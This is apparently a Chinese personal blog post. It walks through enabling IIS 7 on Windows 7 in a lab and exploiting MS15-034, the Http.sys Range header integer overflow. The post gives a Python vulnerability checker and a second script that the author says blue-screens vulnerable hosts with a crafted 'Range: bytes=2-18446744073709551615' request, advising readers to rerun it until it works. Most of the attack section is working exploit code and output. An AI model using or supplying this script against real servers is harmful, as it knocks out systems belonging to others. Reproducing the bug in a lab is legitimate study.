win 7 打开iis 7服务

进入win 7的控制面板,选择打开或关闭Windows功能,如下图:

1

出现windows功能选项,选择下面的选项就会开启iis7服务:

2

开启成功后,直接在开始里面输入iis,打开internet信息服务(IIS)管理器,如下图可以看到default网站已经启动,直接访问网址就可以得到iis7经典界面了!

3 4

攻击代码

用下面代码检测是否存在漏洞

⇒  python vul.py 172.16.69.67
[*] Audit Started
[!!] Looks VULN

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

'''
___.                                   .___ __                         __  
\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
| __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
| \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |  
|___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|  
    \/     \/\/                \/      \/                        \/        
                                                           MS15-034 Checker
 
Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.
-BF
 
 
8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
 
'''
import socket
import random
import sys
 
ipAddr=sys.argv[1]
hexAllFfff = "18446744073709551615"
 
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
 
print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print "[*] Not IIS"
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print "[*] Looks Patched"
else:
    print "[*] Unexpected response, cannot discern patch status"

用下面的代码可以将存在漏洞的机子蓝屏,不过有时会出现socket.error: [Errno 54] Connection reset by peer错误,没事多运行几次就成功了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

import socket
import random
import sys
 
ipAddr = sys.argv[1]
port = 80
hexAllFfff  = "18446744073709551615"
 
print "[*] Audit Started"
req1 = "GET / HTTP/1.0\r\n\r\n"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print "[*] Not IIS"
    exit(0)
client_socket.close()
 
req = "GET /welcome.png HTTP/1.1\r\nHost: stuff\r\nRange: bytes=2-" + hexAllFfff + "\r\n\r\n"
 
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print "[*] Looks Patched"
else:
    print "[*] Unexpected response, cannot discern patch status"

运行上面的代码

python vul.py 172.16.69.67

成功后的留念,这两段代码的主要区别在于bytes后面的数字:

5

今天还学会了新招了,要找漏洞相关的信息可以到twitter上直接搜索ms15-034就可以搜到很多大牛写的分析文档了。

参考

  1. IIS服务器漏洞(MS15-034)威胁分析
  2. IIS 系列 Http.sys 处理 Range 整数溢出漏洞 应急分析报告
  3. MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞分析
  4. The Delicate Art of Remote Checks – A Glance Into MS15-034
  5. An Analysis Of MS15-034